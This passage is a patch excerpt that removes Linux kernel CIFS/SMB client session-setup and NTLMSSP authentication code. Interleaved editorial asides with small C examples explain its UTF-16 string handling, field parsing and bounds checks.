+-		rc = PTR_ERR(chan->server);
+-		chan->server = NULL;
+-		spin_unlock(&ses->chan_lock);
+-		goto out;
+-	}
+-	chan->iface = iface;
+-	ses->chan_count++;
+-	atomic_set(&ses->chan_seq, 0);
+-
+-	/* Mark this channel as needing connect/setup */
+-	cifs_chan_set_need_reconnect(ses, chan->server);
+-
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	/*
+-	 * We need to allocate the server crypto now as we will need
+-	 * to sign packets before we generate the channel signing key
+-	 * (we sign with the session key)
+-	 */
+-	rc = smb311_crypto_shash_allocate(chan->server);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-	rc = cifs_negotiate_protocol(xid, ses, chan->server);
+-	if (!rc)
+-		rc = cifs_setup_session(xid, ses, chan->server, cifs_sb->local_nls);
+-
+-	mutex_unlock(&ses->session_mutex);
+-
+-out:
+-	if (rc && chan->server) {
+-		/*
+-		 * we should avoid race with these delayed works before we
+-		 * remove this channel
+-		 */
+-		cancel_delayed_work_sync(&chan->server->echo);
+-		cancel_delayed_work_sync(&chan->server->resolve);
+-		cancel_delayed_work_sync(&chan->server->reconnect);
+-
+-		spin_lock(&ses->chan_lock);
+-		/* we rely on all bits beyond chan_count to be clear */
+-		cifs_chan_clear_need_reconnect(ses, chan->server);
+-		ses->chan_count--;
+-		/*
+-		 * chan_count should never reach 0 as at least the primary
+-		 * channel is always allocated
+-		 */
+-		WARN_ON(ses->chan_count < 1);
+-		spin_unlock(&ses->chan_lock);
+-
+-		cifs_put_tcp_session(chan->server, 0);
+-	}
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static __u32 cifs_ssetup_hdr(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server,
+-			     SESSION_SETUP_ANDX *pSMB)
+-{
+-	__u32 capabilities = 0;
+-
+-	/* init fields common to all four types of SessSetup */
+-	/* Note that offsets for first seven fields in req struct are same  */
+-	/*	in CIFS Specs so does not matter which of 3 forms of struct */
+-	/*	that we use in next few lines                               */
+-	/* Note that header is initialized to zero in header_assemble */
+-	pSMB->req.AndXCommand = 0xFF;
+-	pSMB->req.MaxBufferSize = cpu_to_le16(min_t(u32,
+-					CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4,
+-					USHRT_MAX));
+-	pSMB->req.MaxMpxCount = cpu_to_le16(server->maxReq);
+-	pSMB->req.VcNumber = cpu_to_le16(1);
+-
+-	/* Now no need to set SMBFLG_CASELESS or obsolete CANONICAL PATH */
+-
+-	/* BB verify whether signing required on neg or just on auth frame
+-	   (and NTLM case) */
+-
+-	capabilities = CAP_LARGE_FILES | CAP_NT_SMBS | CAP_LEVEL_II_OPLOCKS |
+-			CAP_LARGE_WRITE_X | CAP_LARGE_READ_X;
+-
+-	if (server->sign)
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_UNICODE;
+-		capabilities |= CAP_UNICODE;
+-	}
+-	if (ses->capabilities & CAP_STATUS32) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_ERR_STATUS;
+-		capabilities |= CAP_STATUS32;
+-	}
+-	if (ses->capabilities & CAP_DFS) {
+-		pSMB->req.hdr.Flags2 |= SMBFLG2_DFS;
+-		capabilities |= CAP_DFS;
+-	}
+-	if (ses->capabilities & CAP_UNIX)
+-		capabilities |= CAP_UNIX;
+-
+-	return capabilities;
+-}
+-
+-static void
+-unicode_oslm_strings(char **pbcc_area, const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* Copy OS version */
+-	bytes_ret = cifs_strtoUTF16((__le16 *)bcc_ptr, "Linux version ", 32,
+-				    nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, init_utsname()->release,
+-				    32, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* trailing null */
+-
+-	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, CIFS_NETWORK_OPSYS,
+-				    32, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* trailing null */
+-
+-	*pbcc_area = bcc_ptr;
+-}
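
[Editorial aside, not part of the patch: the bytes_ret bookkeeping above advances the pointer by 2 bytes per converted unit. A minimal ASCII-only stand-in for cifs_strtoUTF16(), which additionally maps through the mount's NLS codepage; it returns the number of 16-bit units written excluding the terminator, and dst must have room for max_units + 1 units.]

#include <stdint.h>
#include <stdio.h>

static size_t ascii_to_utf16le(uint8_t *dst, const char *src, size_t max_units)
{
	size_t i;

	for (i = 0; i < max_units && src[i]; i++) {
		dst[2 * i] = (uint8_t)src[i]; /* low byte first: little-endian */
		dst[2 * i + 1] = 0;
	}
	dst[2 * i] = 0;                       /* 16-bit terminator */
	dst[2 * i + 1] = 0;
	return i;
}

int main(void)
{
	uint8_t buf[66];
	size_t n = ascii_to_utf16le(buf, "Linux version ", 32);

	printf("wrote %zu UTF-16 units\n", n);
	return 0;
}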
+-
+-static void unicode_domain_string(char **pbcc_area, struct cifs_ses *ses,
+-				   const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* copy domain */
+-	if (ses->domainName == NULL) {
+-		/* Sending null domain better than using a bogus domain name (as
+-		we did briefly in 2.6.18) since server will use its default */
+-		*bcc_ptr = 0;
+-		*(bcc_ptr+1) = 0;
+-		bytes_ret = 0;
+-	} else
+-		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->domainName,
+-					    CIFS_MAX_DOMAINNAME_LEN, nls_cp);
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2;  /* account for null terminator */
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void unicode_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
+-				   const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int bytes_ret = 0;
+-
+-	/* BB FIXME add check that strings total less
+-	than 335 or will need to send them as arrays */
+-
+-	/* copy user */
+-	if (ses->user_name == NULL) {
+-		/* null user mount */
+-		*bcc_ptr = 0;
+-		*(bcc_ptr+1) = 0;
+-	} else {
+-		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->user_name,
+-					    CIFS_MAX_USERNAME_LEN, nls_cp);
+-	}
+-	bcc_ptr += 2 * bytes_ret;
+-	bcc_ptr += 2; /* account for null termination */
+-
+-	unicode_domain_string(&bcc_ptr, ses, nls_cp);
+-	unicode_oslm_strings(&bcc_ptr, nls_cp);
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void ascii_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
+-				 const struct nls_table *nls_cp)
+-{
+-	char *bcc_ptr = *pbcc_area;
+-	int len;
+-
+-	/* copy user */
+-	/* BB what about null user mounts - check that we do this BB */
+-	/* copy user */
+-	if (ses->user_name != NULL) {
+-		len = strscpy(bcc_ptr, ses->user_name, CIFS_MAX_USERNAME_LEN);
+-		if (WARN_ON_ONCE(len < 0))
+-			len = CIFS_MAX_USERNAME_LEN - 1;
+-		bcc_ptr += len;
+-	}
+-	/* else null user mount */
+-	*bcc_ptr = 0;
+-	bcc_ptr++; /* account for null termination */
+-
+-	/* copy domain */
+-	if (ses->domainName != NULL) {
+-		len = strscpy(bcc_ptr, ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
+-		if (WARN_ON_ONCE(len < 0))
+-			len = CIFS_MAX_DOMAINNAME_LEN - 1;
+-		bcc_ptr += len;
+-	} /* else we will send a null domain name
+-	     so the server will default to its own domain */
+-	*bcc_ptr = 0;
+-	bcc_ptr++;
+-
+-	/* BB check for overflow here */
+-
+-	strcpy(bcc_ptr, "Linux version ");
+-	bcc_ptr += strlen("Linux version ");
+-	strcpy(bcc_ptr, init_utsname()->release);
+-	bcc_ptr += strlen(init_utsname()->release) + 1;
+-
+-	strcpy(bcc_ptr, CIFS_NETWORK_OPSYS);
+-	bcc_ptr += strlen(CIFS_NETWORK_OPSYS) + 1;
+-
+-	*pbcc_area = bcc_ptr;
+-}
+-
+-static void
+-decode_unicode_ssetup(char **pbcc_area, int bleft, struct cifs_ses *ses,
+-		      const struct nls_table *nls_cp)
+-{
+-	int len;
+-	char *data = *pbcc_area;
+-
+-	cifs_dbg(FYI, "bleft %d\n", bleft);
+-
+-	kfree(ses->serverOS);
+-	ses->serverOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverOS=%s\n", ses->serverOS);
+-	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
+-	data += len;
+-	bleft -= len;
+-	if (bleft <= 0)
+-		return;
+-
+-	kfree(ses->serverNOS);
+-	ses->serverNOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverNOS=%s\n", ses->serverNOS);
+-	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
+-	data += len;
+-	bleft -= len;
+-	if (bleft <= 0)
+-		return;
+-
+-	kfree(ses->serverDomain);
+-	ses->serverDomain = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
+-	cifs_dbg(FYI, "serverDomain=%s\n", ses->serverDomain);
+-
+-	return;
+-}
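
[Editorial aside, not part of the patch: the decoder above walks consecutive NUL-terminated UTF-16LE fields, shrinking bleft by each field's length including its terminator. A self-contained sketch of the same arithmetic (UniStrnlen() * 2 + 2); field contents are made up for the demo.]

#include <stdint.h>
#include <stdio.h>

/* Byte length of one NUL-terminated UTF-16LE field within max bytes,
 * including the two terminator bytes. */
static size_t utf16le_field_len(const uint8_t *p, size_t max)
{
	for (size_t i = 0; i + 1 < max; i += 2)
		if (p[i] == 0 && p[i + 1] == 0)
			return i + 2;
	return max; /* unterminated: consume everything left */
}

int main(void)
{
	/* "OS", "NOS", "DOM", each UTF-16LE with a NUL terminator */
	const uint8_t blob[] = { 'O',0,'S',0,0,0, 'N',0,'O',0,'S',0,0,0,
				 'D',0,'O',0,'M',0,0,0 };
	size_t left = sizeof(blob);
	const uint8_t *data = blob;
	int field = 0;

	while (left > 0) {
		size_t len = utf16le_field_len(data, left);

		printf("field %d: %zu bytes\n", field++, len);
		data += len;
		left -= len;
	}
	return 0;
}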
+-
+-static void decode_ascii_ssetup(char **pbcc_area, __u16 bleft,
+-				struct cifs_ses *ses,
+-				const struct nls_table *nls_cp)
+-{
+-	int len;
+-	char *bcc_ptr = *pbcc_area;
+-
+-	cifs_dbg(FYI, "decode sessetup ascii. bleft %d\n", bleft);
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len >= bleft)
+-		return;
+-
+-	kfree(ses->serverOS);
+-
+-	ses->serverOS = kmalloc(len + 1, GFP_KERNEL);
+-	if (ses->serverOS) {
+-		memcpy(ses->serverOS, bcc_ptr, len);
+-		ses->serverOS[len] = 0;
+-		if (strncmp(ses->serverOS, "OS/2", 4) == 0)
+-			cifs_dbg(FYI, "OS/2 server\n");
+-	}
+-
+-	bcc_ptr += len + 1;
+-	bleft -= len + 1;
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len >= bleft)
+-		return;
+-
+-	kfree(ses->serverNOS);
+-
+-	ses->serverNOS = kmalloc(len + 1, GFP_KERNEL);
+-	if (ses->serverNOS) {
+-		memcpy(ses->serverNOS, bcc_ptr, len);
+-		ses->serverNOS[len] = 0;
+-	}
+-
+-	bcc_ptr += len + 1;
+-	bleft -= len + 1;
+-
+-	len = strnlen(bcc_ptr, bleft);
+-	if (len > bleft)
+-		return;
+-
+-	/* No domain field in LANMAN case. Domain is
+-	   returned by old servers in the SMB negprot response */
+-	/* BB For newer servers which do not support Unicode,
+-	   but thus do return domain here we could add parsing
+-	   for it later, but it is not very important */
+-	cifs_dbg(FYI, "ascii: bytes left %d\n", bleft);
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
+-				    struct cifs_ses *ses)
+-{
+-	unsigned int tioffset; /* challenge message target info area */
+-	unsigned int tilen; /* challenge message target info area length  */
+-	CHALLENGE_MESSAGE *pblob = (CHALLENGE_MESSAGE *)bcc_ptr;
+-	__u32 server_flags;
+-
+-	if (blob_len < sizeof(CHALLENGE_MESSAGE)) {
+-		cifs_dbg(VFS, "challenge blob len %d too small\n", blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(pblob->Signature, "NTLMSSP", 8)) {
+-		cifs_dbg(VFS, "blob signature incorrect %s\n",
+-			 pblob->Signature);
+-		return -EINVAL;
+-	}
+-	if (pblob->MessageType != NtLmChallenge) {
+-		cifs_dbg(VFS, "Incorrect message type %d\n",
+-			 pblob->MessageType);
+-		return -EINVAL;
+-	}
+-
+-	server_flags = le32_to_cpu(pblob->NegotiateFlags);
+-	cifs_dbg(FYI, "%s: negotiate=0x%08x challenge=0x%08x\n", __func__,
+-		 ses->ntlmssp->client_flags, server_flags);
+-
+-	if ((ses->ntlmssp->client_flags & (NTLMSSP_NEGOTIATE_SEAL | NTLMSSP_NEGOTIATE_SIGN)) &&
+-	    (!(server_flags & NTLMSSP_NEGOTIATE_56) && !(server_flags & NTLMSSP_NEGOTIATE_128))) {
+-		cifs_dbg(VFS, "%s: requested signing/encryption but server did not return either 56-bit or 128-bit session key size\n",
+-			 __func__);
+-		return -EINVAL;
+-	}
+-	if (!(server_flags & NTLMSSP_NEGOTIATE_NTLM) && !(server_flags & NTLMSSP_NEGOTIATE_EXTENDED_SEC)) {
+-		cifs_dbg(VFS, "%s: server does not seem to support either NTLMv1 or NTLMv2\n", __func__);
+-		return -EINVAL;
+-	}
+-	if (ses->server->sign && !(server_flags & NTLMSSP_NEGOTIATE_SIGN)) {
+-		cifs_dbg(VFS, "%s: forced packet signing but server does not seem to support it\n",
+-			 __func__);
+-		return -EOPNOTSUPP;
+-	}
+-	if ((ses->ntlmssp->client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
+-	    !(server_flags & NTLMSSP_NEGOTIATE_KEY_XCH))
+-		pr_warn_once("%s: authentication has been weakened as server does not support key exchange\n",
+-			     __func__);
+-
+-	ses->ntlmssp->server_flags = server_flags;
+-
+-	memcpy(ses->ntlmssp->cryptkey, pblob->Challenge, CIFS_CRYPTO_KEY_SIZE);
+-	/* In particular we can examine sign flags */
+-	/* BB spec says that if AvId field of MsvAvTimestamp is populated then
+-		we must set the MIC field of the AUTHENTICATE_MESSAGE */
+-
+-	tioffset = le32_to_cpu(pblob->TargetInfoArray.BufferOffset);
+-	tilen = le16_to_cpu(pblob->TargetInfoArray.Length);
+-	if (tioffset > blob_len || tioffset + tilen > blob_len) {
+-		cifs_dbg(VFS, "tioffset + tilen too high %u + %u\n",
+-			 tioffset, tilen);
+-		return -EINVAL;
+-	}
+-	if (tilen) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
+-						 GFP_KERNEL);
+-		if (!ses->auth_key.response) {
+-			cifs_dbg(VFS, "Challenge target info alloc failure\n");
+-			return -ENOMEM;
+-		}
+-		ses->auth_key.len = tilen;
+-	}
+-
+-	return 0;
+-}
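
[Editorial aside, not part of the patch: the tioffset/tilen test above validates an offset+length pair against the blob before copying. A common defensive variant phrases the check as a subtraction so the addition can never wrap; a minimal sketch, not the kernel's code.]

#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True if the [off, off + len) window fits inside a blob of blob_len
 * bytes. off + len is never computed, so it cannot overflow. */
static bool range_in_blob(uint32_t off, uint32_t len, uint32_t blob_len)
{
	return off <= blob_len && len <= blob_len - off;
}

int main(void)
{
	assert(range_in_blob(10, 5, 16));
	assert(!range_in_blob(10, 7, 16));
	assert(!range_in_blob(UINT32_MAX, 2, 16)); /* no wraparound */
	return 0;
}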
+-
+-static int size_of_ntlmssp_blob(struct cifs_ses *ses, int base_size)
+-{
+-	int sz = base_size + ses->auth_key.len
+-		- CIFS_SESS_KEY_SIZE + CIFS_CPHTXT_SIZE + 2;
+-
+-	if (ses->domainName)
+-		sz += sizeof(__le16) * strnlen(ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
+-	else
+-		sz += sizeof(__le16);
+-
+-	if (ses->user_name)
+-		sz += sizeof(__le16) * strnlen(ses->user_name, CIFS_MAX_USERNAME_LEN);
+-	else
+-		sz += sizeof(__le16);
+-
+-	if (ses->workstation_name[0])
+-		sz += sizeof(__le16) * strnlen(ses->workstation_name,
+-					       ntlmssp_workstation_name_size(ses));
+-	else
+-		sz += sizeof(__le16);
+-
+-	return sz;
+-}
+-
+-static inline void cifs_security_buffer_from_str(SECURITY_BUFFER *pbuf,
+-						 char *str_value,
+-						 int str_length,
+-						 unsigned char *pstart,
+-						 unsigned char **pcur,
+-						 const struct nls_table *nls_cp)
+-{
+-	unsigned char *tmp = pstart;
+-	int len;
+-
+-	if (!pbuf)
+-		return;
+-
+-	if (!pcur)
+-		pcur = &tmp;
+-
+-	if (!str_value) {
+-		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
+-		pbuf->Length = 0;
+-		pbuf->MaximumLength = 0;
+-		*pcur += sizeof(__le16);
+-	} else {
+-		len = cifs_strtoUTF16((__le16 *)*pcur,
+-				      str_value,
+-				      str_length,
+-				      nls_cp);
+-		len *= sizeof(__le16);
+-		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
+-		pbuf->Length = cpu_to_le16(len);
+-		pbuf->MaximumLength = cpu_to_le16(len);
+-		*pcur += len;
+-	}
+-}
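
[Editorial aside, not part of the patch: the helper above fills an MS-NLMP-style buffer descriptor -- 16-bit length, 16-bit maximum length, 32-bit offset from the start of the message -- while appending the payload at a moving cursor. A sketch of the same shape; field names are illustrative and endianness conversion is omitted for brevity.]

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct sec_buf {
	uint16_t len;
	uint16_t max_len;
	uint32_t offset;
};

/* Append n payload bytes at *cur and record where they landed. */
static void sec_buf_pack(struct sec_buf *b, const void *src, uint16_t n,
			 const uint8_t *start, uint8_t **cur)
{
	memcpy(*cur, src, n);
	b->offset = (uint32_t)(*cur - start);
	b->len = n;
	b->max_len = n;
	*cur += n;
}

int main(void)
{
	uint8_t msg[64] = { 0 };
	uint8_t *cur = msg + 16; /* pretend 16-byte fixed header */
	struct sec_buf domain;

	sec_buf_pack(&domain, "EXAMPLE", 7, msg, &cur);
	printf("offset=%u len=%u\n", domain.offset, domain.len);
	return 0;
}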
+-
+-/* BB Move to ntlmssp.c eventually */
+-
+-int build_ntlmssp_negotiate_blob(unsigned char **pbuffer,
+-				 u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	NEGOTIATE_MESSAGE *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(NEGOTIATE_MESSAGE));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlm_neg_ret;
+-	}
+-	sec_blob = (NEGOTIATE_MESSAGE *)*pbuffer;
+-
+-	memset(*pbuffer, 0, sizeof(NEGOTIATE_MESSAGE));
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmNegotiate;
+-
+-	/* BB is NTLMV2 session security format easier to use here? */
+-	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
+-		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
+-		NTLMSSP_NEGOTIATE_SIGN;
+-	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	tmp = *pbuffer + sizeof(NEGOTIATE_MESSAGE);
+-	ses->ntlmssp->client_flags = flags;
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      NULL,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      NULL,
+-				      CIFS_MAX_WORKSTATION_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlm_neg_ret:
+-	return rc;
+-}
+-
+-/*
+- * Build ntlmssp blob with additional fields, such as version,
+- * supported by modern servers. For safety limit to SMB3 or later
+- * See notes in MS-NLMP Section 2.2.2.1 e.g.
+- */
+-int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer,
+-				 u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct negotiate_message *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(struct negotiate_message));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlm_smb3_neg_ret;
+-	}
+-	sec_blob = (struct negotiate_message *)*pbuffer;
+-
+-	memset(*pbuffer, 0, sizeof(struct negotiate_message));
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmNegotiate;
+-
+-	/* BB is NTLMV2 session security format easier to use here? */
+-	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
+-		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
+-		NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_VERSION;
+-	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	sec_blob->Version.ProductMajorVersion = LINUX_VERSION_MAJOR;
+-	sec_blob->Version.ProductMinorVersion = LINUX_VERSION_PATCHLEVEL;
+-	sec_blob->Version.ProductBuild = cpu_to_le16(SMB3_PRODUCT_BUILD);
+-	sec_blob->Version.NTLMRevisionCurrent = NTLMSSP_REVISION_W2K3;
+-
+-	tmp = *pbuffer + sizeof(struct negotiate_message);
+-	ses->ntlmssp->client_flags = flags;
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      NULL,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      NULL,
+-				      CIFS_MAX_WORKSTATION_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlm_smb3_neg_ret:
+-	return rc;
+-}
+-
+-
+-int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+-					u16 *buflen,
+-				   struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server,
+-				   const struct nls_table *nls_cp)
+-{
+-	int rc;
+-	AUTHENTICATE_MESSAGE *sec_blob;
+-	__u32 flags;
+-	unsigned char *tmp;
+-	int len;
+-
+-	rc = setup_ntlmv2_rsp(ses, nls_cp);
+-	if (rc) {
+-		cifs_dbg(VFS, "Error %d during NTLMSSP authentication\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlmv2_ret;
+-	}
+-
+-	len = size_of_ntlmssp_blob(ses, sizeof(AUTHENTICATE_MESSAGE));
+-	*pbuffer = kmalloc(len, GFP_KERNEL);
+-	if (!*pbuffer) {
+-		rc = -ENOMEM;
+-		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
+-		*buflen = 0;
+-		goto setup_ntlmv2_ret;
+-	}
+-	sec_blob = (AUTHENTICATE_MESSAGE *)*pbuffer;
+-
+-	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
+-	sec_blob->MessageType = NtLmAuthenticate;
+-
+-	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
+-		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
+-
+-	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
+-	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+-
+-	sec_blob->LmChallengeResponse.BufferOffset =
+-				cpu_to_le32(sizeof(AUTHENTICATE_MESSAGE));
+-	sec_blob->LmChallengeResponse.Length = 0;
+-	sec_blob->LmChallengeResponse.MaximumLength = 0;
+-
+-	sec_blob->NtChallengeResponse.BufferOffset =
+-				cpu_to_le32(tmp - *pbuffer);
+-	if (ses->user_name != NULL) {
+-		memcpy(tmp, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
+-				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		tmp += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
+-
+-		sec_blob->NtChallengeResponse.Length =
+-				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		sec_blob->NtChallengeResponse.MaximumLength =
+-				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-	} else {
+-		/*
+-		 * don't send an NT Response for anonymous access
+-		 */
+-		sec_blob->NtChallengeResponse.Length = 0;
+-		sec_blob->NtChallengeResponse.MaximumLength = 0;
+-	}
+-
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      ses->domainName,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->UserName,
+-				      ses->user_name,
+-				      CIFS_MAX_USERNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      ses->workstation_name,
+-				      ntlmssp_workstation_name_size(ses),
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	if ((ses->ntlmssp->server_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
+-	    (!ses->server->session_estab || ses->ntlmssp->sesskey_per_smbsess) &&
+-	    !calc_seckey(ses)) {
+-		memcpy(tmp, ses->ntlmssp->ciphertext, CIFS_CPHTXT_SIZE);
+-		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
+-		sec_blob->SessionKey.Length = cpu_to_le16(CIFS_CPHTXT_SIZE);
+-		sec_blob->SessionKey.MaximumLength =
+-				cpu_to_le16(CIFS_CPHTXT_SIZE);
+-		tmp += CIFS_CPHTXT_SIZE;
+-	} else {
+-		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
+-		sec_blob->SessionKey.Length = 0;
+-		sec_blob->SessionKey.MaximumLength = 0;
+-	}
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlmv2_ret:
+-	return rc;
+-}
+-
+-enum securityEnum
+-cifs_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
+-{
+-	switch (server->negflavor) {
+-	case CIFS_NEGFLAVOR_EXTENDED:
+-		switch (requested) {
+-		case Kerberos:
+-		case RawNTLMSSP:
+-			return requested;
+-		case Unspecified:
+-			if (server->sec_ntlmssp &&
+-			    (global_secflags & CIFSSEC_MAY_NTLMSSP))
+-				return RawNTLMSSP;
+-			if ((server->sec_kerberos || server->sec_mskerberos) &&
+-			    (global_secflags & CIFSSEC_MAY_KRB5))
+-				return Kerberos;
+-			fallthrough;
+-		default:
+-			return Unspecified;
+-		}
+-	case CIFS_NEGFLAVOR_UNENCAP:
+-		switch (requested) {
+-		case NTLMv2:
+-			return requested;
+-		case Unspecified:
+-			if (global_secflags & CIFSSEC_MAY_NTLMV2)
+-				return NTLMv2;
+-			break;
+-		default:
+-			break;
+-		}
+-		fallthrough;
+-	default:
+-		return Unspecified;
+-	}
+-}
+-
+-struct sess_data {
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_cp;
+-	void (*func)(struct sess_data *);
+-	int result;
+-
+-	/* we will send the SMB in three pieces:
+-	 * a fixed length beginning part, an optional
+-	 * SPNEGO blob (which can be zero length), and a
+-	 * last part which will include the strings
+-	 * and rest of bcc area. This allows us to avoid
